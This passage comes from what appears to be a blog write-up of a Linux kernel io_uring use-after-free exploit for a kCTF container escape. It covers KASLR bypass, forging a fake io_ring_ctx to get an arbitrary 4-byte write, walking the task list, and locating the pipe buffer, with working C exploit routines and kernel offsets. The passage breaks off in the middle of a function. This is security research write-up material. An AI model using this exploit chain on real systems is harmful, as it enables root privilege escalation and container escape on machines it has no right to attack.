<p><code class="language-plaintext highlighter-rouge">error_entry</code> seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code>. The address was the address of the <code class="language-plaintext highlighter-rouge">call sync_regs</code> portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the <code class="language-plaintext highlighter-rouge">call</code> was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.</p>
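
<p>The KASLR math itself is just a subtraction. A minimal sketch, assuming the leaked pointer’s distance from the kernel base is known ahead of time from the target kernel’s symbols: <code class="language-plaintext highlighter-rouge">LEAKED_PTR_OFF</code> is a made-up placeholder, the helper names are hypothetical, and the sanity check assumes the default x86-64 layout (kernel text mapped at or above <code class="language-plaintext highlighter-rouge">0xffffffff80000000</code> with a 2 MiB aligned slide).</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stdint.h&gt;

/* PLACEHOLDER: (leaked error_entry pointer) - (kernel base). Must be taken
 * from the symbols of the exact kernel image being targeted. */
#define LEAKED_PTR_OFF 0x1001234UL

/* Recover the randomized kernel base from the leaked text pointer. */
static uint64_t kernel_base_from_leak(uint64_t leaked_ptr)
{
    return leaked_ptr - LEAKED_PTR_OFF;
}

/* Translate a symbol's static offset into its randomized address. */
static uint64_t kaddr(uint64_t kbase, uint64_t sym_off)
{
    return kbase + sym_off;
}

/* Cheap sanity check, ASSUMING a 2 MiB aligned slide and the default x86-64
 * kernel text mapping. A failure most likely means the leak was stale. */
static int looks_like_kernel_base(uint64_t kbase)
{
    return (kbase &amp; 0x1fffffUL) == 0 &amp;&amp; kbase &gt;= 0xffffffff80000000ULL;
}
</code></pre></div></div>
<p>A check like <code class="language-plaintext highlighter-rouge">looks_like_kernel_base</code> is optional, but it is a cheap way to bail out before aiming any writes at addresses derived from a bad leak.</p>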

<p>Again, this portion didn’t take very long to figure out because I had just been introduced to <code class="language-plaintext highlighter-rouge">cpu_entry_area</code> by the aforementioned blogposts at the time.</p>

<h2 id="where-are-the-write-gadgets">Where are the Write Gadgets?</h2>
<p>I actually struggled to find a satisfactory write gadget for a few days. I was kind of spoiled by my experience finding my arbitrary read gadget and thought this would be a similarly easy search. I followed roughly the same process of going through syscalls which took an <code class="language-plaintext highlighter-rouge">fd</code> as an argument and tracing through them looking for calls to <code class="language-plaintext highlighter-rouge">copy_to_user</code>, but I didn’t have the same luck. During this time, I was discussing the topic with my very talented friend <a href="https://twitter.com/Firzen14">@Firzen14</a> and he brought up this concept here: <a href="https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9">https://googleprojectzero.blogspot.com/2022/11/a-very-powerful-clipboard-samsung-in-the-wild-exploit-chain.html#h.yfq0poarwpr9</a>. In the P0 blogpost, they talk about how the <code class="language-plaintext highlighter-rouge">signalfd_ctx</code> of a <code class="language-plaintext highlighter-rouge">signalfd</code> file is stored in the <code class="language-plaintext highlighter-rouge">f.file-&gt;private_data</code> field and how the <code class="language-plaintext highlighter-rouge">signalfd</code> syscall allows the attacker to perform a write of the <code class="language-plaintext highlighter-rouge">ctx-&gt;sigmask</code>. So in our situation, since we control the entire fake file contents, forging a fake <code class="language-plaintext highlighter-rouge">signalfd_ctx</code> in memory would be quite easy since we have access to an entire page of memory.</p>

<p>I couldn’t use this technique for my personally imposed challenge though since the technique was already published. But this did open my eyes to the concept of storing contexts and objects in the <code class="language-plaintext highlighter-rouge">private_data</code> field of our <code class="language-plaintext highlighter-rouge">struct file</code>. So at this point, I went hunting for usages of <code class="language-plaintext highlighter-rouge">private_data</code> in the kernel code base. As you can see, the member is used in many many places: <a href="https://elixir.bootlin.com/linux/latest/C/ident/private_data">https://elixir.bootlin.com/linux/latest/C/ident/private_data</a>.</p>

<p>This was very encouraging to me since I was bound to find some way to achieve an arbitrary write with so many instances of the member being used in so many different code paths; however, I still struggled a while finding a suitable gadget. Finally, I decided to look back at <code class="language-plaintext highlighter-rouge">io_uring</code> itself.</p>

<p>Looking for instances where the <code class="language-plaintext highlighter-rouge">file-&gt;private_data</code> was used, I quickly found an instance right in the very function that was related to the bug. In <a href="https://elixir.bootlin.com/linux/v5.19/source/fs/io_uring.c#L5244"><code class="language-plaintext highlighter-rouge">io_msg_ring</code></a>, you can see that a <code class="language-plaintext highlighter-rouge">target_ctx</code> of type <code class="language-plaintext highlighter-rouge">io_ring_ctx</code> is derived from <code class="language-plaintext highlighter-rouge">req-&gt;file-&gt;private_data</code>. Since we control the fake <code class="language-plaintext highlighter-rouge">file</code>, we can control the <code class="language-plaintext highlighter-rouge">private_data</code> contents (a pointer to a fake <code class="language-plaintext highlighter-rouge">io_ring_ctx</code> in this case).</p>

<p><code class="language-plaintext highlighter-rouge">io_msg_ring</code> is used to pass data from one io ring to another, and you can see that in <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code>, we actually retrieve an <code class="language-plaintext highlighter-rouge">io_uring_cqe</code> struct from our potentially faked <code class="language-plaintext highlighter-rouge">io_ring_ctx</code> via <code class="language-plaintext highlighter-rouge">io_get_cqe</code>. Immediately, we see several <code class="language-plaintext highlighter-rouge">WRITE_ONCE</code> macros used to write data to this object. This was looking extremely promising. I initially was going to use this write as my gadget, but as you will see later, the write sequences and the offsets at which they occur didn’t really fit my exploitation plan. So for now, we’ll find a 2nd write in the same code path.</p>

<p>Immediately after the call to <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code>, there is one to <code class="language-plaintext highlighter-rouge">io_commit_cqring</code> using our faked <code class="language-plaintext highlighter-rouge">io_ring_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">static</span> <span class="kr">inline</span> <span class="kt">void</span> <span class="nf">io_commit_cqring</span><span class="p">(</span><span class="k">struct</span> <span class="n">io_ring_ctx</span> <span class="o">*</span><span class="n">ctx</span><span class="p">)</span>
<span class="p">{</span>
	<span class="cm">/* order cqe stores with ring update */</span>
	<span class="n">smp_store_release</span><span class="p">(</span><span class="o">&amp;</span><span class="n">ctx</span><span class="o">-&gt;</span><span class="n">rings</span><span class="o">-&gt;</span><span class="n">cq</span><span class="p">.</span><span class="n">tail</span><span class="p">,</span> <span class="n">ctx</span><span class="o">-&gt;</span><span class="n">cached_cq_tail</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>This is basically a <code class="language-plaintext highlighter-rouge">memcpy</code>: we write the contents of <code class="language-plaintext highlighter-rouge">ctx-&gt;cached_cq_tail</code> (100% user-controlled) to <code class="language-plaintext highlighter-rouge">&amp;ctx-&gt;rings-&gt;cq.tail</code> (100% user-controlled). The size of the write in this case is 4 bytes. So we have achieved an arbitrary 4 byte write. From here, it just boils down to what type of exploit you want to write, so I decided to do one I had never done in the spirit of my self-imposed challenge.</p>
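
<p>To aim that store, the fake <code class="language-plaintext highlighter-rouge">rings</code> pointer has to be set so that <code class="language-plaintext highlighter-rouge">&amp;rings-&gt;cq.tail</code> lands exactly on the target. The following is a sketch of that arithmetic against a simulated byte buffer rather than a real kernel. <code class="language-plaintext highlighter-rouge">RINGS_CQ_TAIL_OFF</code> is an assumed offset that should be verified against the target build, and <code class="language-plaintext highlighter-rouge">fake_ctx_fields</code>, <code class="language-plaintext highlighter-rouge">prep_write32</code> and <code class="language-plaintext highlighter-rouge">sim_commit_cqring</code> are hypothetical names used only here.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code>#include &lt;stddef.h&gt;
#include &lt;stdint.h&gt;
#include &lt;string.h&gt;

/* ASSUMED offset of cq.tail inside struct io_rings; verify it against the
 * target kernel build before relying on it. */
#define RINGS_CQ_TAIL_OFF 0xc0UL

/* Only the two io_ring_ctx fields that io_commit_cqring() touches. */
struct fake_ctx_fields {
    uint64_t rings;            /* value for ctx-&gt;rings */
    uint32_t cached_cq_tail;   /* value for ctx-&gt;cached_cq_tail */
};

/* Choose the field values so that the store writes `value` at `target`. */
static struct fake_ctx_fields prep_write32(uint64_t target, uint32_t value)
{
    struct fake_ctx_fields f = {
        .rings = target - RINGS_CQ_TAIL_OFF,
        .cached_cq_tail = value,
    };
    return f;
}

/* Stand-in for the kernel store: `mem` plays the role of memory starting at
 * address 0, and the 4-byte store mirrors
 * smp_store_release(&amp;ctx-&gt;rings-&gt;cq.tail, ctx-&gt;cached_cq_tail). */
static void sim_commit_cqring(uint8_t *mem, const struct fake_ctx_fields *ctx)
{
    size_t dst = (size_t)(ctx-&gt;rings + RINGS_CQ_TAIL_OFF);
    memcpy(mem + dst, &amp;ctx-&gt;cached_cq_tail, sizeof(ctx-&gt;cached_cq_tail));
}
</code></pre></div></div>
<p>Keep in mind that this only models the second write in the code path. The earlier <code class="language-plaintext highlighter-rouge">WRITE_ONCE</code> stores in <code class="language-plaintext highlighter-rouge">io_fill_cqe_aux</code> still happen, so the rest of the fake context has to send them somewhere harmless.</p>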

<h2 id="exploitation-plan">Exploitation Plan</h2>
<p>Now that we have all the possible tools we could need, it was time to start crafting an exploitation plan. In the kCTF environment you are running as an unprivileged user inside of a container, and your goal is to escape the container and read the flag value from the host file system.</p>

<p>I honestly had no idea where to start in this regard, but luckily there are some good articles out there explaining the situation. <a href="https://www.cyberark.com/resources/threat-research-blog/the-route-to-root-container-escape-using-kernel-exploitation">This post from Cyberark</a> was extremely helpful in understanding how containerization of a task is achieved in the kernel. And I also got some very helpful pointers from Andy Nguyen’s <a href="https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html">blog post</a> on his kCTF exploit. Huge thanks to Andy for being one of the few to actually detail their steps for escaping the container.</p>

<h3 id="finding-init">Finding Init</h3>
<p>At this point, my goal is to find the host Init <code class="language-plaintext highlighter-rouge">task_struct</code> in memory and read the values of a few important members: <code class="language-plaintext highlighter-rouge">real_cred</code>, <code class="language-plaintext highlighter-rouge">cred</code>, and <code class="language-plaintext highlighter-rouge">nsproxy</code>. <code class="language-plaintext highlighter-rouge">real_cred</code> is used to track the user and group IDs that were originally responsible for creating the process and, unlike <code class="language-plaintext highlighter-rouge">cred</code>, <code class="language-plaintext highlighter-rouge">real_cred</code> remains constant and does not change due to things like <code class="language-plaintext highlighter-rouge">setuid</code>. <code class="language-plaintext highlighter-rouge">cred</code> is used to convey the “effective” credentials of a task, like the effective user ID for instance. Finally, and super importantly because we are trapped in a container, <code class="language-plaintext highlighter-rouge">nsproxy</code> is a pointer to a struct that contains all of the information about our task’s namespaces like network, mount, IPC, etc. All of these members are pointers, so if we are able to find their values via our arbitrary read, we should then be able to overwrite our own credentials and namespace in our <code class="language-plaintext highlighter-rouge">task_struct</code>. Luckily, the address of the <code class="language-plaintext highlighter-rouge">init</code> task is a constant offset from the kernel base, so once we have broken KASLR with our read of the <code class="language-plaintext highlighter-rouge">error_entry</code> address, we can copy those values with our arbitrary read capability, since they reside at known addresses (offsets from the <code class="language-plaintext highlighter-rouge">init</code> task symbol).</p>
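<p>To make that address arithmetic concrete, here is a minimal sketch that reuses the offsets defined in the full exploit source at the end of this post. The helper name, the struct, and the example leak value in the usage note are made up for illustration, and the offsets only hold for the specific kernel build I targeted, so treat them as assumptions for anything else:</p>

```c
#include <stdint.h>

// Offsets copied from the exploit source; they are specific to one kernel
// build and must be re-derived for any other build
#define EE_OFF        UINT64_C(0xe0124d)   // error_entry - kernel base
#define INIT_OFF      UINT64_C(0x18149c0)  // init_task - kernel base
#define REAL_CRED_OFF UINT64_C(0x720)      // offset of task->real_cred
#define CRED_OFF      UINT64_C(0x728)      // offset of task->cred
#define NSPROXY_OFF   UINT64_C(0x780)      // offset of task->nsproxy

// Hypothetical container for the addresses we want to read from
struct init_addrs {
    uint64_t kernel_base;
    uint64_t init_task;
    uint64_t real_cred_slot;  // address holding init's real_cred pointer
    uint64_t cred_slot;       // address holding init's cred pointer
    uint64_t nsproxy_slot;    // address holding init's nsproxy pointer
};

// Turn a leaked error_entry pointer into the addresses of init's members
static struct init_addrs locate_init(uint64_t leaked_error_entry)
{
    struct init_addrs a;
    a.kernel_base    = leaked_error_entry - EE_OFF;
    a.init_task      = a.kernel_base + INIT_OFF;
    a.real_cred_slot = a.init_task + REAL_CRED_OFF;
    a.cred_slot      = a.init_task + CRED_OFF;
    a.nsproxy_slot   = a.init_task + NSPROXY_OFF;
    return a;
}
```

<p>With an invented leak of <code class="language-plaintext highlighter-rouge">0xffffffff81e0124d</code>, this yields a kernel base of <code class="language-plaintext highlighter-rouge">0xffffffff81000000</code> and an <code class="language-plaintext highlighter-rouge">init_task</code> at <code class="language-plaintext highlighter-rouge">0xffffffff828149c0</code>. Each of the three slots is then one 8-byte arbitrary read away.</p>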

<h3 id="forging-objects">Forging Objects</h3>
<p>With those values in hand, we now need to find our own <code class="language-plaintext highlighter-rouge">task_struct</code> in memory so that we can overwrite our members with those of <code class="language-plaintext highlighter-rouge">init</code>. To do this, I took advantage of the fact that the <code class="language-plaintext highlighter-rouge">task_struct</code> has a linked list of tasks on the system. So early in the exploit, I spawn a child process with a known name that fits within the <code class="language-plaintext highlighter-rouge">task_struct</code> <code class="language-plaintext highlighter-rouge">comm</code> field. Then, as I traverse the linked list of tasks on the system, I simply check each task’s <code class="language-plaintext highlighter-rouge">comm</code> field for my easily identifiable child process. You can see how I do that in this code snippet:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">traverse_tasks</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>    
    <span class="c1">// Process name buf</span>
    <span class="kt">char</span> <span class="n">current_comm</span><span class="p">[</span><span class="mi">16</span><span class="p">]</span> <span class="o">=</span> <span class="p">{</span> <span class="mi">0</span> <span class="p">};</span>

    <span class="c1">// Get the next task after init</span>
    <span class="kt">uint64_t</span> <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_init_task</span> <span class="o">+</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

    <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span> 
        <span class="n">err</span><span class="p">(</span><span class="s">"Invalid task after init: 0x%lx"</span><span class="p">,</span> <span class="n">current</span><span class="p">);</span>    
    <span class="p">}</span>

    <span class="c1">// Read the comm</span>
    <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
    <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

    <span class="c1">// While we don't have NULL, traverse the list</span>
    <span class="k">while</span> <span class="p">(</span><span class="n">task_valid</span><span class="p">(</span><span class="n">current</span><span class="p">))</span>
    <span class="p">{</span>
        <span class="n">current_next</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">current_next</span><span class="p">);</span>
        <span class="n">current</span> <span class="o">=</span> <span class="n">current_next</span> <span class="o">-</span> <span class="n">TASKS_NEXT_OFF</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">current</span> <span class="o">==</span> <span class="n">g_init_task</span><span class="p">)</span> <span class="p">{</span> <span class="k">break</span><span class="p">;</span> <span class="p">}</span>

        <span class="c1">// Read the comm</span>
        <span class="n">read_comm_at</span><span class="p">(</span><span class="n">current</span> <span class="o">+</span> <span class="n">COMM_OFF</span><span class="p">,</span> <span class="n">current_comm</span><span class="p">);</span>
        <span class="c1">//printf("    - Address: 0x%lx, Name: '%s'\n", current, current_comm);</span>

        <span class="c1">// If we find the target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">TARGET_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_target_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>

        <span class="c1">// If we find our target comm, save it</span>
        <span class="k">if</span> <span class="p">(</span><span class="o">!</span><span class="n">strcmp</span><span class="p">(</span><span class="n">current_comm</span><span class="p">,</span> <span class="n">OUR_TASK</span><span class="p">))</span>
        <span class="p">{</span>
            <span class="n">g_our_task</span> <span class="o">=</span> <span class="n">current</span><span class="p">;</span>
        <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
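<p>The <code class="language-plaintext highlighter-rouge">current_next - TASKS_NEXT_OFF</code> step above is the same trick the kernel’s <code class="language-plaintext highlighter-rouge">container_of</code> macro uses: the list links point at the embedded list node, not at the start of the task. Here is a minimal userspace sketch of that walk. The <code class="language-plaintext highlighter-rouge">fake_task</code> and <code class="language-plaintext highlighter-rouge">list_node</code> types and all helper names are hypothetical stand-ins, not the kernel’s real definitions:</p>

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

// Hypothetical stand-in for the kernel's struct list_head
struct list_node {
    struct list_node *next;
    struct list_node *prev;
};

// Hypothetical, heavily simplified stand-in for task_struct
struct fake_task {
    int pid;
    struct list_node tasks;  // embedded node, like task_struct->tasks
    char comm[16];           // process name, like task_struct->comm
};

// Same arithmetic as `current_next - TASKS_NEXT_OFF` in the exploit:
// step back from the embedded node to the start of the enclosing task
static struct fake_task *task_from_node(struct list_node *node)
{
    return (struct fake_task *)((char *)node - offsetof(struct fake_task, tasks));
}

// Make `init` the head of an empty circular list
static void init_task_list(struct fake_task *init)
{
    init->tasks.next = &init->tasks;
    init->tasks.prev = &init->tasks;
}

// Link `t` in at the tail of the circular list headed by `init`
static void link_task(struct fake_task *init, struct fake_task *t)
{
    t->tasks.prev = init->tasks.prev;
    t->tasks.next = &init->tasks;
    init->tasks.prev->next = &t->tasks;
    init->tasks.prev = &t->tasks;
}

// Walk the list starting after `init` and stop once we wrap back around
static struct fake_task *find_task_by_comm(struct fake_task *init, const char *name)
{
    for (struct list_node *n = init->tasks.next; n != &init->tasks; n = n->next)
    {
        struct fake_task *t = task_from_node(n);
        if (strncmp(t->comm, name, sizeof(t->comm)) == 0) { return t; }
    }
    return NULL;
}
```

<p>The exploit does the same thing, except every pointer dereference is replaced by an arbitrary kernel read and the wrap-around check compares against <code class="language-plaintext highlighter-rouge">g_init_task</code>.</p>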

<p>You can also see that not only did we find our target task, we also found our own task in memory. This is important for the way I chose to exploit this bug because, remember, we need to fake a few objects in memory, like the <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> for instance. Usually this is done by crafting objects in the kernel heap and somehow discovering their address with a leak. In my case, I have a whole pipe buffer, which is 4096 bytes of memory, to utilize. The only problem is, I have no idea where it is. But I do know that I have an open file descriptor to it, and I know that each task has a <a href="https://elixir.bootlin.com/linux/v5.19/source/include/linux/fdtable.h#L49">file descriptor table</a> inside of its <code class="language-plaintext highlighter-rouge">files</code> member. After some time spent <code class="language-plaintext highlighter-rouge">printk</code>-ing offsets, I was able to traverse my own task’s file descriptor table and learn the address of my pipe buffer. The table entry for our UAF file descriptor holds the address of our UAF <code class="language-plaintext highlighter-rouge">struct file</code>, which lives inside the pipe buffer page. Since that page is obviously page-aligned, I can just page-align the address we read from the file descriptor table to get the base of the pipe buffer. So now I know exactly where in memory my pipe buffer is, and I also know at what offset on that page our UAF <code class="language-plaintext highlighter-rouge">struct file</code> resides. I have a small helper function to set a “scratch space” region address as a global and then use that memory to set up our fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code>. You can see those functions here, first finding our pipe buffer address:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">find_pipe_buf_addr</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Get the base of the files array</span>
    <span class="kt">uint64_t</span> <span class="n">files_ptr</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">g_file_array</span><span class="p">);</span>
    
    <span class="c1">// Adjust the files_ptr to point to our fd in the array</span>
    <span class="n">files_ptr</span> <span class="o">+=</span> <span class="p">(</span><span class="k">sizeof</span><span class="p">(</span><span class="kt">uint64_t</span><span class="p">)</span> <span class="o">*</span> <span class="n">g_uaf_fd</span><span class="p">);</span>

    <span class="c1">// Get the address of our UAF file struct</span>
    <span class="kt">uint64_t</span> <span class="n">curr_file</span> <span class="o">=</span> <span class="n">read_8_at</span><span class="p">(</span><span class="n">files_ptr</span><span class="p">);</span>

    <span class="c1">// Calculate the offset</span>
    <span class="n">g_off</span> <span class="o">=</span> <span class="n">curr_file</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">;</span>

    <span class="c1">// Set the globals</span>
    <span class="n">g_file_addr</span> <span class="o">=</span> <span class="n">curr_file</span><span class="p">;</span>
    <span class="n">g_pipe_buf</span> <span class="o">=</span> <span class="n">g_file_addr</span> <span class="o">-</span> <span class="n">g_off</span><span class="p">;</span>

    <span class="k">return</span><span class="p">;</span>
<span class="p">}</span>
</code></pre></div></div>
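<p>The masking step is small but easy to get backwards, so here is a minimal sketch of it in isolation, assuming 4 KiB pages. The struct and function names are made up for illustration, as is the example address in the usage note:</p>

```c
#include <stdint.h>

// Low 12 bits select the byte within a 4 KiB page
#define PAGE_MASK_4K UINT64_C(0xFFF)

// Hypothetical pair: page base plus offset into that page
struct page_split {
    uint64_t base;
    uint64_t offset;
};

// Split an address into the base of its page and its offset on that page,
// mirroring how g_off and g_pipe_buf are derived from curr_file
static struct page_split split_page_addr(uint64_t addr)
{
    struct page_split s;
    s.offset = addr & PAGE_MASK_4K;
    s.base   = addr - s.offset;
    return s;
}
```

<p>For an invented <code class="language-plaintext highlighter-rouge">struct file</code> address of <code class="language-plaintext highlighter-rouge">0xffff888012345a00</code>, this gives a pipe buffer base of <code class="language-plaintext highlighter-rouge">0xffff888012345000</code> and an offset of <code class="language-plaintext highlighter-rouge">0xa00</code>.</p>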

<p>And then determining the location of our scratch space where we will forge the fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Here, all we're doing is determining which side of the page the UAF file is on,</span>
<span class="c1">// if it's on the front half of the page, the back half is our scratch space</span>
<span class="c1">// and vice versa</span>
<span class="kt">void</span> <span class="nf">set_scratch_space</span><span class="p">(</span><span class="kt">void</span><span class="p">)</span>
<span class="p">{</span>
    <span class="n">g_scratch</span> <span class="o">=</span> <span class="n">g_pipe_buf</span><span class="p">;</span>
    <span class="k">if</span> <span class="p">(</span><span class="n">g_off</span> <span class="o">&lt;</span> <span class="mh">0x500</span><span class="p">)</span> <span class="p">{</span> <span class="n">g_scratch</span> <span class="o">+=</span> <span class="mh">0x500</span><span class="p">;</span> <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>

<p>Now we have one more read to do, and this is really just to make the exploit easier. In order to avoid a lot of debugging while triggering my write, I need to make sure that my fake <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> contains as many valid fields as possible. If you start with a completely <code class="language-plaintext highlighter-rouge">NULL</code> object, you will have to troubleshoot every NULL-deref kernel panic and determine where you went wrong and what kind of value that member should have had. Instead, I chose to copy a legitimate instance of a real <code class="language-plaintext highlighter-rouge">io_uring_ctx</code> by reading its contents into a global buffer. Working now from a good base, our forged object can then be set up properly to perform our arbitrary write. You can see me using the copy and updating the necessary fields here:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="kt">void</span> <span class="nf">write_setup_ctx</span><span class="p">(</span><span class="kt">char</span> <span class="o">*</span><span class="n">buf</span><span class="p">,</span> <span class="kt">uint32_t</span> <span class="n">what</span><span class="p">,</span> <span class="kt">uint64_t</span> <span class="n">where</span><span class="p">)</span>
<span class="p">{</span>
    <span class="c1">// Copy our copied real ring fd </span>
    <span class="n">memcpy</span><span class="p">(</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span><span class="p">],</span> <span class="n">g_ring_copy</span><span class="p">,</span> <span class="mi">256</span><span class="p">);</span>

    <span class="c1">// Set f-&gt;f_count to 1 </span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0x38</span><span class="p">];</span>
    <span class="o">*</span><span class="n">count</span> <span class="o">=</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set f-&gt;private_data to our scratch space</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">g_off</span> <span class="o">+</span> <span class="mh">0xc8</span><span class="p">];</span>
    <span class="o">*</span><span class="n">private_data</span> <span class="o">=</span> <span class="n">g_scratch</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_cached</span>
    <span class="kt">size_t</span> <span class="n">cqe_cached</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x240</span><span class="p">;</span>
    <span class="n">cqe_cached</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_cached</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cached_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cqe_sentinel</span>
    <span class="kt">size_t</span> <span class="n">cqe_sentinel</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x248</span><span class="p">;</span>
    <span class="n">cqe_sentinel</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cqe_sentinel</span><span class="p">];</span>

    <span class="c1">// We need ctx-&gt;cqe_cached &lt; ctx-&gt;cqe_sentinel</span>
    <span class="o">*</span><span class="n">sentinel_ptr</span> <span class="o">=</span> <span class="n">NULL_MEM</span> <span class="o">+</span> <span class="mi">1</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;rings so that ctx-&gt;rings-&gt;cq.tail is written to. That is at </span>
    <span class="c1">// offset 0xc0 from cq base address</span>
    <span class="kt">size_t</span> <span class="n">rings</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x10</span><span class="p">;</span>
    <span class="n">rings</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">rings</span><span class="p">];</span>
    <span class="o">*</span><span class="n">rings_ptr</span> <span class="o">=</span> <span class="n">where</span> <span class="o">-</span> <span class="mh">0xc0</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cached_cq_tail which is our what</span>
    <span class="kt">size_t</span> <span class="n">cq_tail</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x250</span><span class="p">;</span>
    <span class="n">cq_tail</span> <span class="o">&amp;=</span> <span class="mh">0xFFF</span><span class="p">;</span>
    <span class="kt">uint32_t</span> <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint32_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_tail</span><span class="p">];</span>
    <span class="o">*</span><span class="n">cq_tail_ptr</span> <span class="o">=</span> <span class="n">what</span><span class="p">;</span>

    <span class="c1">// Set ctx-&gt;cq_wait the list head to itself (so that it's "empty")</span>
    <span class="kt">size_t</span> <span class="n">real_cq_wait</span> <span class="o">=</span> <span class="n">g_scratch</span> <span class="o">+</span> <span class="mh">0x268</span><span class="p">;</span>
    <span class="kt">size_t</span> <span class="n">cq_wait</span> <span class="o">=</span> <span class="p">(</span><span class="n">real_cq_wait</span> <span class="o">&amp;</span> <span class="mh">0xFFF</span><span class="p">);</span>
    <span class="kt">uint64_t</span> <span class="o">*</span><span class="n">cq_wait_ptr</span> <span class="o">=</span> <span class="p">(</span><span class="kt">uint64_t</span> <span class="o">*</span><span class="p">)</span><span class="o">&amp;</span><span class="n">buf</span><span class="p">[</span><span class="n">cq_wait</span><span class="p">];</span>
